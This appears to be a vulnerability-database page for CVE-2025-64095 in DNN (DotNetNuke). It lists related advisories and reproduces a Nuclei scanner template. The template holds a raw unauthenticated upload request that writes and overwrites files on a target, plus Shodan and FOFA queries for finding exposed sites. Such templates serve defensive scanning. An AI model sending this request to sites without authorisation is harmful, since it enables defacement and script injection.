| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Dnnsoftware Dotnetnuke | 6 Nov 202520:20 | – | githubexploit | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Dnnsoftware Dotnetnuke | 18 Nov 202518:53 | – | githubexploit | |
| CVE-2025-64095 | 29 Oct 202500:01 | – | circl | |
| DNN 代码问题漏洞 | 28 Oct 202500:00 | – | cnnvd | |
| CVE-2025-64095 | 28 Oct 202521:46 | – | cve | |
| CVE-2025-64095 DNN Insufficient Access Control - Image Upload allows for Site Content Overwrite | 28 Oct 202521:46 | – | cvelist | |
| EUVD-2025-36564 | 29 Oct 202521:48 | – | euvd | |
| DNN Insufficient Access Control - Image Upload allows for Site Content Overwrite | 29 Oct 202521:48 | – | github | |
| U.S. Dept Of Defense: DNN - Unrestricted Arbitrary File Upload #████████ | 6 Nov 202511:53 | – | hackerone | |
| CVE-2025-64095 | 28 Oct 202522:15 | – | nvd |
id: CVE-2025-64095
info:
name: DNN - Unrestricted Arbitrary File Upload
author: DhiyaneshDk,pussycat0x
severity: critical
description: |
DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.
impact: |
Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.
remediation: |
Update to version 10.1.1 or later.
reference:
- https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload
metadata:
verified: true
max-request: 1
vendor: dnnsoftware
product: dotnetnuke
shodan-query:
- "Set-Cookie: dnn_IsMobile"
- http.favicon.hash:-1465479343
fofa-query:
- app="dotnetnuke"
- "Set-Cookie: dnn_IsMobile"
- icon_hash="-1465479343"
tags: cve,cve2025,intrusive,file-upload,dnn,vkev
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="file"; filename="{{filename}}.png"
Content-Type: image/png
{{randstr}}
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="storageFolderID"
1
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="portalID"
0
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="overrideFiles"
1
--------------------------7RKjWLYyrhvUn2AA31fJQ3
Content-Disposition: form-data; name="mode"
Default
--------------------------7RKjWLYyrhvUn2AA31fJQ3--
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"group"'
- 'delete_type'
condition: and
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4a0a004730450220756a18de0cdc3ace6e4650ae86ac2487c1d462b38358f70237bf83b7d148d778022100c6a3060b167abed05219a2fb8bbd56959619960db32c3d7285e140e45a557b9e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation